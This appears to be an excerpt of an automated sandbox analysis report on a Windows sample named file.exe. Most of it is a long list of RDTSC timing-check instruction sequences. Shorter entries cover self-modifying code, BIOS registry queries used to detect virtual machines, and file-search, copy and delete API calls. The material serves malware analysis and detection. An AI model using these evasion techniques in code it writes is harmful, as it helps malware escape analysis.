                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FEAF second address: B5FEB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FEB5 second address: B5FED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F33B8517E9Eh 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E4F8 second address: B5E4FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E4FD second address: B5E50F instructions: 0x00000000 rdtsc 0x00000002 je 00007F33B8517E98h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F33B8517E96h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E50F second address: B5E524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74301h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E7F9 second address: B5E80D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F33B8517E96h 0x00000008 jo 00007F33B8517E96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E80D second address: B5E811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E811 second address: B5E82B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F33B8517EA4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E9EC second address: B5E9FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F33B8C742F6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E9FE second address: B5EA36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F33B8517EA9h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F33B8517EA1h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5EA36 second address: B5EA3B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5EB7D second address: B5EB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F500 second address: B5F543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FEh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F33B8C742FAh 0x00000011 jmp 00007F33B8C742FCh 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b js 00007F33B8C742FCh 0x00000021 jnp 00007F33B8C742F6h 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pushad 0x0000002c popad 0x0000002d pop eax 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F543 second address: B5F55A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33B8517EA1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F55A second address: B5F55E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FD10 second address: B5FD14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FD14 second address: B5FD29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F33B8C742FDh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DB0B second address: B5DB4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA8h 0x00000007 jmp 00007F33B8517E9Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F33B8517EA9h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DB4F second address: B5DB6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5DB6B second address: B5DB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B63E9E second address: B63EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C742FAh 0x00000009 popad 0x0000000a jnl 00007F33B8C742FAh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B63EB7 second address: B63EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66B3B second address: B66B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66B3F second address: B66B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B707F3 second address: B707F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B707F7 second address: B707FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B707FB second address: B70801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70801 second address: B70815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517E9Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B70815 second address: B7081B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7E2DD second address: B7E2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7E2EB second address: B7E2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7E2EF second address: B7E2F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80EAB second address: B80EB5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F33B8C7430Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B855B4 second address: B855B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B855B8 second address: B855DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C742FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e jne 00007F33B8C742F6h 0x00000014 pop edx 0x00000015 push eax 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B855DA second address: B85604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F33B8517EA3h 0x0000000b jno 00007F33B8517E96h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jbe 00007F33B8517EA2h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8ED49 second address: B8ED4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8ED4D second address: B8ED69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8ED69 second address: B8ED6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F5DB second address: B8F5DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F5DF second address: B8F5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F5E8 second address: B8F611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8517E9Ch 0x00000009 jmp 00007F33B8517EA8h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F611 second address: B8F617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F617 second address: B8F629 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F33B8517E96h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F629 second address: B8F62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90083 second address: B9008D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F33B8517EACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9008D second address: B900B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C74300h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e ja 00007F33B8C742F6h 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 popad 0x0000001a push edi 0x0000001b pop edi 0x0000001c pop eax 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B900B5 second address: B900C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F33B8517E96h 0x0000000a jp 00007F33B8517E96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91C23 second address: B91C37 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F33B8C742F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F33B8C742F6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B94A85 second address: B94AB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517E9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F33B8517E9Eh 0x0000000f jmp 00007F33B8517E9Ah 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B94AB4 second address: B94ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B966A9 second address: B966B3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F33B8517E9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B966B3 second address: B966BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D525 second address: A9D53F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D53F second address: A9D544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D544 second address: A9D569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8517EA8h 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9D569 second address: A9D573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F33B8C742F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB333E second address: BB335B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB335B second address: BB3361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB3361 second address: BB3366 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB3366 second address: BB3382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F33B8C74301h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB3382 second address: BB338C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F33B8517E9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8F58 second address: AA8F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F33B8C742FFh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB71B1 second address: BB71FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA0h 0x00000007 jnl 00007F33B8517E9Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F33B8517E9Fh 0x00000015 jmp 00007F33B8517E9Bh 0x0000001a pushad 0x0000001b js 00007F33B8517E96h 0x00000021 jnl 00007F33B8517E96h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB7327 second address: BB732B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB732B second address: BB736D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F33B8517E96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f jmp 00007F33B8517EA2h 0x00000014 pop edi 0x00000015 push ecx 0x00000016 jng 00007F33B8517E96h 0x0000001c pop ecx 0x0000001d pushad 0x0000001e jmp 00007F33B8517EA5h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC70D3 second address: BC70DD instructions: 0x00000000 rdtsc 0x00000002 js 00007F33B8C742F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5F60 second address: BC5F70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517E9Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5F70 second address: BC5F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC6238 second address: BC623C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC67AB second address: BC67D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F33B8C742FEh 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jg 00007F33B8C742F6h 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F33B8C742FCh 0x0000001e pop edi 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC6914 second address: BC6929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F33B8517E9Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC6AAA second address: BC6AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F33B8C742F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC6AB6 second address: BC6AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F33B8517E9Bh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9B68 second address: BC9B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9B6C second address: BC9B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9FE3 second address: BC9FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C102B3 second address: 4C102B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C102B8 second address: 4C102D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C102D0 second address: 4C102D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C102D4 second address: 4C102E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C102E7 second address: 4C10334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx edi, ax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F33B8517EA6h 0x00000016 add ecx, 365CD338h 0x0000001c jmp 00007F33B8517E9Bh 0x00000021 popfd 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10334 second address: 4C10338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10338 second address: 4C10352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F33B8517E9Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10352 second address: 4C10358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C10358 second address: 4C10374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517E9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov ecx, 2A2BBAE3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C103BA second address: 4C103CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33B8C742FDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C103CB second address: 4C10428 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov edx, esi 0x0000000f pushfd 0x00000010 jmp 00007F33B8517EA8h 0x00000015 sub si, 7648h 0x0000001a jmp 00007F33B8517E9Bh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F33B8517EA4h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEF84A second address: AEF84E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 931A2A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ADB3C9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AD9BBE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9319C3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AF2DE2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B6BEB1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006E38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006E4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_006DDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_006DE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_006E4570
